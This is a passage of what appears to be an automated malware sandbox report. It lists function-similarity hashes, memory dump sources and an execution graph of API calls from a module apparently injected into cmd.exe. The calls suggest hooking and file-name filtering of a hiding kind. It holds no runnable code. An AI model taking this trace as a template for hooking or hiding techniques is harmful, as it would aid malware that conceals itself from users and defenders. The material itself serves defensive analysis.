                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: 6d116d03695d2485b7fd81e950c433c15aeb4669f4503b5c2889b00c5dc7765a
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: D351AF3720C782E1EA749A35A4543FE6692FBC4BF0F840035CF6A43B99DA36C50A8B40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction ID: 4dbc32447c6e2d4530dfc1b8aa44c200b2c3a6399bea8dc449a76b107fc5046f
                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction Fuzzy Hash: DC41D432619A89E6EB108F75E4447EAA7A2F358784FC04131EB5E87754EB38C441C780
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction ID: 075e0ee5ab856f52793fd74ad60e0d37977b86e05c2e5619eafe79c5092f8b8f
                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                          • Instruction Fuzzy Hash: BE41E772629A95D6E7609F35E4047EAB7A1FB887C4F804131EF5E87754EB38C405CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction ID: eda675b608450d1b98c27133dd58fdb40deda528cd4d0094b9588a010599d30a
                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction Fuzzy Hash: 1A112B32218B8592EB218B25F4442A9B7E6F789B94F984224EF9E47B64DF3CC551CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction ID: d0ea1f0f01099bba34f3f93ff3f253b38abdd96ae72080870b149aeeeb87dd36
                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                          • Instruction Fuzzy Hash: 3F112E32219B4592EB218B25F4442A977E6FB88B98F984220DF9E07B54DF3DC555CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction ID: 9aea890d2f69d4f4f6db632077a96361da4f8a665e7bf107ea741a3ee6150ebb
                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction Fuzzy Hash: 53115B21A15B89E6EE14CB76A8042A977B2F788FD0F984135DF5E53765EF38D482C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction ID: ac23ae9009e14ae519abc6e3ce89e3ddb5d4b4d182b87b14bd62545e88c2731c
                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction Fuzzy Hash: 22E06D31602609EBEB148F62D8083A936E2FB88F05FC4C024CA1A07350EF7D84D9C780
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction ID: f4018e2778af764a71ec7319eb5c57e2044f0bfab1a600363d9fd178d11beafe
                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                          • Instruction Fuzzy Hash: 69E06531601619EAEB148F62D80839936E2FF88F45F84C024CA1A0B350EF7D849D8B41
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction ID: 727118ef396b3c074debe071726d3083f61c787e5b250e753320eccf353fdf73
                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction Fuzzy Hash: 11E0ED71611509EBEB189B62D8042A976A2FB88B15FC48074CA1A07310EE3C84D9D650
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction ID: bdd1397b67824a9355833ff5b806eb658c9c9ea7f3d16c52e7659c855b548343
                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                          • Instruction Fuzzy Hash: A9E0ED72611519EAEB189B62D8042A976A2FF88B55F848034CA1A0B310FE38849D9A11

                          Execution Graph

                          Execution Coverage:1.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1412
                          Total number of Limit Nodes:6
                          execution_graph 8137 166be49f370 VirtualProtect 8913 166be49f870 8914 166be49f8a0 8913->8914 8916 166be49f8c7 8913->8916 8915 166be49cb10 __std_exception_copy 13 API calls 8914->8915 8914->8916 8920 166be49f8b4 8914->8920 8915->8920 8917 166be49f99c 8916->8917 8936 166be49c558 EnterCriticalSection 8916->8936 8921 166be49fab3 8917->8921 8923 166be49fa03 8917->8923 8929 166be49f9ca 8917->8929 8919 166be49f904 8920->8916 8920->8919 8922 166be49f949 8920->8922 8924 166be49fac0 8921->8924 8938 166be49c5ac LeaveCriticalSection 8921->8938 8925 166be49d1f4 __std_exception_copy 13 API calls 8922->8925 8933 166be49fa61 8923->8933 8937 166be49c5ac LeaveCriticalSection 8923->8937 8928 166be49f94e 8925->8928 8930 166be49d04c _invalid_parameter_noinfo 38 API calls 8928->8930 8929->8923 8931 166be49cab0 _invalid_parameter_noinfo 14 API calls 8929->8931 8930->8919 8932 166be49f9f3 8931->8932 8934 166be49cab0 _invalid_parameter_noinfo 14 API calls 8932->8934 8935 166be49cab0 14 API calls _invalid_parameter_noinfo 8933->8935 8934->8923 8935->8933 8599 166be492ff0 8600 166be493061 8599->8600 8601 166be493384 8600->8601 8602 166be49308d GetModuleHandleA 8600->8602 8603 166be49309f GetProcAddress 8602->8603 8604 166be4930b1 8602->8604 8603->8604 8604->8601 8605 166be4930d8 StrCmpNIW 8604->8605 8605->8601 8611 166be4930fd 8605->8611 8606 166be491a30 6 API calls 8606->8611 8607 166be49320f lstrlenW 8607->8611 8608 166be4932b9 lstrlenW 8608->8611 8609 166be493f88 StrCmpNIW 8609->8611 8610 166be491cfc StrCmpIW StrCmpW 8610->8611 8611->8601 8611->8606 8611->8607 8611->8608 8611->8609 8611->8610 7562 166be4a46f5 7571 166be499324 7562->7571 7564 166be4a470d 7565 166be499324 _CreateFrameInfo 9 API calls 7564->7565 7566 166be4a4728 7565->7566 7567 166be499324 _CreateFrameInfo 9 API calls 7566->7567 7568 166be4a473c 7567->7568 7569 166be499324 _CreateFrameInfo 9 API calls 7568->7569 7570 166be4a477e 7569->7570 7574 166be499340 7571->7574 7573 166be49932d 7573->7564 7575 166be49935f GetLastError 7574->7575 7576 166be499358 7574->7576 7586 166be499c8c 7575->7586 7576->7573 7590 166be499aac 7586->7590 7591 166be499b96 TlsGetValue 7590->7591 7597 166be499af0 __vcrt_FlsAlloc 7590->7597 7592 166be499b1e LoadLibraryExW 7594 166be499b3f GetLastError 7592->7594 7595 166be499bbd 7592->7595 7593 166be499bdd GetProcAddress 7593->7591 7594->7597 7595->7593 7596 166be499bd4 FreeLibrary 7595->7596 7596->7593 7597->7591 7597->7592 7597->7593 7598 166be499b61 LoadLibraryExW 7597->7598 7598->7595 7598->7597 8939 166be498672 8940 166be4990c0 __std_exception_copy 38 API calls 8939->8940 8941 166be49869d 8940->8941 8138 166be495974 8139 166be49597a 8138->8139 8150 166be497fa0 8139->8150 8143 166be4959de 8145 166be495a77 8145->8143 8147 166be495bfd 8145->8147 8163 166be497b80 8145->8163 8146 166be495cfb 8147->8146 8148 166be495d77 VirtualProtect 8147->8148 8148->8143 8149 166be495da3 GetLastError 8148->8149 8149->8143 8152 166be497fab 8150->8152 8151 166be4959bd 8151->8143 8159 166be494400 8151->8159 8152->8151 8153 166be49b470 _invalid_parameter_noinfo 2 API calls 8152->8153 8154 166be497fca 8152->8154 8153->8152 8155 166be497fd5 8154->8155 8169 166be4987b8 8154->8169 8173 166be4987d8 8155->8173 8160 166be49441d 8159->8160 8162 166be49448c 8160->8162 8177 166be494670 8160->8177 8162->8145 8164 166be497bc7 8163->8164 8202 166be497950 8164->8202 8167 166be498070 _invalid_parameter_noinfo 8 API calls 8168 166be497bf1 8167->8168 8168->8145 8170 166be4987c6 std::bad_alloc::bad_alloc 8169->8170 8171 166be499178 Concurrency::cancel_current_task 2 API calls 8170->8171 8172 166be4987d7 8171->8172 8174 166be4987e6 std::bad_alloc::bad_alloc 8173->8174 8175 166be499178 Concurrency::cancel_current_task 2 API calls 8174->8175 8176 166be497fdb 8175->8176 8178 166be4946b7 8177->8178 8179 166be494694 8177->8179 8180 166be4946ed 8178->8180 8197 166be494250 8178->8197 8179->8178 8191 166be494120 8179->8191 8182 166be49471d 8180->8182 8186 166be494250 2 API calls 8180->8186 8184 166be494753 8182->8184 8187 166be494120 3 API calls 8182->8187 8185 166be49476f 8184->8185 8188 166be494120 3 API calls 8184->8188 8189 166be49478b 8185->8189 8190 166be494250 2 API calls 8185->8190 8186->8182 8187->8184 8188->8185 8189->8162 8190->8189 8192 166be494141 8191->8192 8193 166be494196 VirtualQuery 8192->8193 8194 166be4941ca VirtualAlloc 8192->8194 8195 166be4941b0 8192->8195 8193->8192 8193->8195 8194->8195 8196 166be4941fb GetLastError 8194->8196 8195->8178 8196->8192 8196->8195 8198 166be494268 8197->8198 8199 166be4942bd VirtualQuery 8198->8199 8200 166be4942d7 8198->8200 8201 166be494322 GetLastError 8198->8201 8199->8198 8199->8200 8200->8180 8201->8198 8203 166be49796b 8202->8203 8204 166be49798f 8203->8204 8205 166be497981 SetLastError 8203->8205 8204->8167 8205->8204 8612 166be4927e8 8613 166be492867 8612->8613 8614 166be4928c9 GetFileType 8613->8614 8625 166be492998 8613->8625 8615 166be4928d7 StrCpyW 8614->8615 8616 166be4928ed 8614->8616 8617 166be4928fc 8615->8617 8628 166be491ad4 GetFinalPathNameByHandleW 8616->8628 8621 166be49299d 8617->8621 8626 166be492906 8617->8626 8619 166be493f88 StrCmpNIW 8619->8621 8620 166be493f88 StrCmpNIW 8620->8626 8621->8619 8622 166be493708 4 API calls 8621->8622 8623 166be491dd4 2 API calls 8621->8623 8621->8625 8622->8621 8623->8621 8626->8620 8626->8625 8633 166be493708 StrCmpIW 8626->8633 8637 166be491dd4 8626->8637 8629 166be491afe StrCmpNIW 8628->8629 8630 166be491b3d 8628->8630 8629->8630 8631 166be491b18 lstrlenW 8629->8631 8630->8617 8631->8630 8632 166be491b2a StrCpyW 8631->8632 8632->8630 8634 166be493751 PathCombineW 8633->8634 8635 166be49373a StrCpyW StrCatW 8633->8635 8636 166be49375a 8634->8636 8635->8636 8636->8626 8638 166be491deb 8637->8638 8639 166be491df4 8637->8639 8640 166be491530 2 API calls 8638->8640 8639->8626 8640->8639 8641 166be49b7ea 8642 166be49c2f4 14 API calls 8641->8642 8643 166be49b7ef 8642->8643 8644 166be49b85f 8643->8644 8645 166be49b815 GetModuleHandleW 8643->8645 8658 166be49b6f8 8644->8658 8645->8644 8648 166be49b822 8645->8648 8648->8644 8653 166be49b904 GetModuleHandleExW 8648->8653 8654 166be49b938 GetProcAddress 8653->8654 8655 166be49b94a 8653->8655 8654->8655 8656 166be49b962 8655->8656 8657 166be49b95b FreeLibrary 8655->8657 8656->8644 8657->8656 8670 166be49c558 EnterCriticalSection 8658->8670 7599 166be49acec 7602 166be4990c0 7599->7602 7601 166be49ad15 7603 166be499116 7602->7603 7604 166be4990e1 7602->7604 7603->7601 7604->7603 7606 166be49c328 7604->7606 7607 166be49c335 7606->7607 7610 166be49c33f 7606->7610 7607->7610 7613 166be49c35a 7607->7613 7609 166be49c346 7618 166be49d04c 7609->7618 7615 166be49d1f4 7610->7615 7612 166be49c352 7612->7603 7613->7612 7614 166be49d1f4 __std_exception_copy 13 API calls 7613->7614 7614->7609 7621 166be49cb10 7615->7621 7689 166be49cef8 7618->7689 7622 166be49cb59 GetLastError 7621->7622 7623 166be49cb2f __std_exception_copy 7621->7623 7624 166be49cb6c 7622->7624 7625 166be49cb54 7623->7625 7630 166be49c940 GetLastError 7623->7630 7626 166be49cb8a SetLastError 7624->7626 7627 166be49cb87 7624->7627 7628 166be49c940 _invalid_parameter_noinfo 11 API calls 7624->7628 7625->7609 7626->7625 7627->7626 7628->7627 7631 166be49c966 7630->7631 7632 166be49c96c SetLastError 7631->7632 7648 166be49d220 7631->7648 7633 166be49c9e5 7632->7633 7633->7625 7636 166be49c9a5 FlsSetValue 7639 166be49c9b1 FlsSetValue 7636->7639 7640 166be49c9c8 7636->7640 7637 166be49c995 FlsSetValue 7655 166be49d2a0 7637->7655 7642 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7639->7642 7661 166be49c758 7640->7661 7644 166be49c9c6 SetLastError 7642->7644 7644->7633 7654 166be49d231 _invalid_parameter_noinfo 7648->7654 7649 166be49d282 7651 166be49d1f4 __std_exception_copy 12 API calls 7649->7651 7650 166be49d266 HeapAlloc 7652 166be49c987 7650->7652 7650->7654 7651->7652 7652->7636 7652->7637 7654->7649 7654->7650 7666 166be49b470 7654->7666 7656 166be49d2a5 HeapFree 7655->7656 7657 166be49c9a3 7655->7657 7656->7657 7658 166be49d2c0 GetLastError 7656->7658 7657->7632 7659 166be49d2cd Concurrency::details::SchedulerProxy::DeleteThis 7658->7659 7660 166be49d1f4 __std_exception_copy 11 API calls 7659->7660 7660->7657 7675 166be49c630 7661->7675 7669 166be49b4c0 7666->7669 7674 166be49c558 EnterCriticalSection 7669->7674 7687 166be49c558 EnterCriticalSection 7675->7687 7690 166be49cf23 7689->7690 7697 166be49cf94 7690->7697 7692 166be49cf4a 7693 166be49cf6d 7692->7693 7707 166be49c3e0 7692->7707 7695 166be49c3e0 _invalid_parameter_noinfo 17 API calls 7693->7695 7696 166be49cf82 7693->7696 7695->7696 7696->7612 7720 166be49ccc8 7697->7720 7702 166be49cfcf 7702->7692 7708 166be49c3ef GetLastError 7707->7708 7709 166be49c438 7707->7709 7710 166be49c404 7708->7710 7709->7693 7711 166be49cba0 _invalid_parameter_noinfo 14 API calls 7710->7711 7712 166be49c41e SetLastError 7711->7712 7712->7709 7713 166be49c441 7712->7713 7714 166be49c3e0 _invalid_parameter_noinfo 15 API calls 7713->7714 7715 166be49c467 7714->7715 7760 166be49ffe8 7715->7760 7721 166be49cd1f 7720->7721 7722 166be49cce4 GetLastError 7720->7722 7721->7702 7726 166be49cd34 7721->7726 7723 166be49ccf4 7722->7723 7733 166be49cba0 7723->7733 7727 166be49cd50 GetLastError SetLastError 7726->7727 7728 166be49cd68 7726->7728 7727->7728 7728->7702 7729 166be49d06c IsProcessorFeaturePresent 7728->7729 7730 166be49d07f 7729->7730 7738 166be49cd80 7730->7738 7734 166be49cbc8 FlsGetValue 7733->7734 7735 166be49cbc4 7733->7735 7734->7735 7736 166be49c940 _invalid_parameter_noinfo 13 API calls 7735->7736 7737 166be49cbde SetLastError 7735->7737 7736->7737 7737->7721 7739 166be49cdba _invalid_parameter_noinfo 7738->7739 7740 166be49cde2 RtlCaptureContext RtlLookupFunctionEntry 7739->7740 7741 166be49ce2e RtlVirtualUnwind 7740->7741 7742 166be49ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7740->7742 7741->7742 7744 166be49ceb6 _invalid_parameter_noinfo 7742->7744 7746 166be498070 7744->7746 7747 166be498079 7746->7747 7748 166be498084 GetCurrentProcess TerminateProcess 7747->7748 7749 166be498848 IsProcessorFeaturePresent 7747->7749 7750 166be498860 7749->7750 7755 166be49891c RtlCaptureContext 7750->7755 7756 166be498936 RtlLookupFunctionEntry 7755->7756 7757 166be498873 7756->7757 7758 166be49894c RtlVirtualUnwind 7756->7758 7759 166be498814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7757->7759 7758->7756 7758->7757 7761 166be4a0001 7760->7761 7762 166be49c48f 7760->7762 7761->7762 7768 166be4a0a40 7761->7768 7764 166be4a0054 7762->7764 7765 166be49c49f 7764->7765 7766 166be4a006d 7764->7766 7765->7693 7766->7765 7786 166be49e8c4 7766->7786 7777 166be49cab0 7768->7777 7770 166be4a0a4f 7776 166be4a0a95 7770->7776 7785 166be49c558 EnterCriticalSection 7770->7785 7776->7762 7778 166be49cb10 __std_exception_copy 13 API calls 7777->7778 7780 166be49cab9 7778->7780 7779 166be49cabe 7779->7770 7780->7779 7781 166be49cae8 FlsGetValue 7780->7781 7783 166be49cae4 7780->7783 7781->7783 7782 166be49cafe 7782->7770 7783->7782 7784 166be49c940 _invalid_parameter_noinfo 13 API calls 7783->7784 7784->7782 7787 166be49cab0 _invalid_parameter_noinfo 14 API calls 7786->7787 7788 166be49e8cd 7787->7788 7789 166be492300 7790 166be492331 7789->7790 7791 166be492412 7790->7791 7792 166be492447 7790->7792 7798 166be492355 7790->7798 7793 166be4924bb 7792->7793 7794 166be49244c 7792->7794 7793->7791 7797 166be4935c8 11 API calls 7793->7797 7806 166be4935c8 GetProcessHeap HeapAlloc 7794->7806 7796 166be49238d StrCmpNIW 7796->7798 7797->7791 7798->7791 7798->7796 7800 166be491d30 7798->7800 7801 166be491db4 7800->7801 7802 166be491d57 GetProcessHeap HeapAlloc 7800->7802 7801->7798 7802->7801 7803 166be491d92 7802->7803 7812 166be491cfc 7803->7812 7810 166be49361b 7806->7810 7807 166be4936d9 GetProcessHeap HeapFree 7807->7791 7808 166be4936d4 7808->7807 7809 166be493666 StrCmpNIW 7809->7810 7810->7807 7810->7808 7810->7809 7811 166be491d30 6 API calls 7810->7811 7811->7810 7813 166be491d13 7812->7813 7815 166be491d1c GetProcessHeap HeapFree 7812->7815 7814 166be491530 2 API calls 7813->7814 7814->7815 7815->7801 7816 166be49b500 7821 166be49c558 EnterCriticalSection 7816->7821 8206 166be49c180 8209 166be49bf38 8206->8209 8216 166be49bf00 8209->8216 8217 166be49bf10 8216->8217 8218 166be49bf15 8216->8218 8219 166be49bebc 13 API calls 8217->8219 8220 166be49bf1c 8218->8220 8219->8218 8221 166be49bf31 8220->8221 8222 166be49bf2c 8220->8222 8224 166be49bebc 8221->8224 8223 166be49bebc 13 API calls 8222->8223 8223->8221 8228 166be49bef2 8224->8228 8229 166be49bec1 8224->8229 8225 166be49beea 8227 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8225->8227 8226 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8226->8229 8227->8228 8229->8225 8229->8226 8942 166be492c80 TlsGetValue TlsGetValue TlsGetValue 8943 166be492cd9 8942->8943 8948 166be492d51 8942->8948 8947 166be492ce1 8943->8947 8943->8948 8944 166be492d4c 8945 166be492e06 TlsSetValue TlsSetValue TlsSetValue 8945->8944 8946 166be493f88 StrCmpNIW 8946->8947 8947->8944 8947->8945 8947->8946 8948->8944 8948->8945 8949 166be493f88 StrCmpNIW 8948->8949 8949->8948 8671 166be495ff9 8672 166be496000 VirtualProtect 8671->8672 8673 166be496029 GetLastError 8672->8673 8674 166be495f10 8672->8674 8673->8674 8675 166be4941f9 8676 166be494146 8675->8676 8677 166be494196 VirtualQuery 8676->8677 8678 166be4941b0 8676->8678 8679 166be4941ca VirtualAlloc 8676->8679 8677->8676 8677->8678 8679->8678 8680 166be4941fb GetLastError 8679->8680 8680->8676 8680->8678 8950 166be4a387c 8951 166be4a38b4 __GSHandlerCheckCommon 8950->8951 8952 166be4a38e0 8951->8952 8954 166be499a24 8951->8954 8955 166be499324 _CreateFrameInfo 9 API calls 8954->8955 8956 166be499a4e 8955->8956 8957 166be499324 _CreateFrameInfo 9 API calls 8956->8957 8958 166be499a5b 8957->8958 8959 166be499324 _CreateFrameInfo 9 API calls 8958->8959 8960 166be499a64 8959->8960 8960->8952 8681 166be49cbfc 8686 166be49f3a0 8681->8686 8683 166be49cc05 8684 166be49cb10 __std_exception_copy 13 API calls 8683->8684 8685 166be49cc22 __vcrt_uninitialize_ptd 8683->8685 8684->8685 8687 166be49f3b1 8686->8687 8688 166be49f3b5 8686->8688 8687->8683 8688->8687 8689 166be49ef88 9 API calls 8688->8689 8689->8687 8690 166be4a4611 __scrt_dllmain_exception_filter 7822 166be49c510 7823 166be49c518 7822->7823 7825 166be49c545 7823->7825 7826 166be49c574 7823->7826 7827 166be49c59f 7826->7827 7828 166be49c5a3 7827->7828 7829 166be49c582 DeleteCriticalSection 7827->7829 7828->7825 7829->7827 8961 166be495c8d 8963 166be495c94 8961->8963 8962 166be495cfb 8963->8962 8964 166be495d77 VirtualProtect 8963->8964 8965 166be495da3 GetLastError 8964->8965 8966 166be495db1 8964->8966 8965->8966 7830 166be498f0c 7837 166be49946c 7830->7837 7833 166be498f19 7838 166be499474 7837->7838 7840 166be4994a5 7838->7840 7841 166be498f15 7838->7841 7854 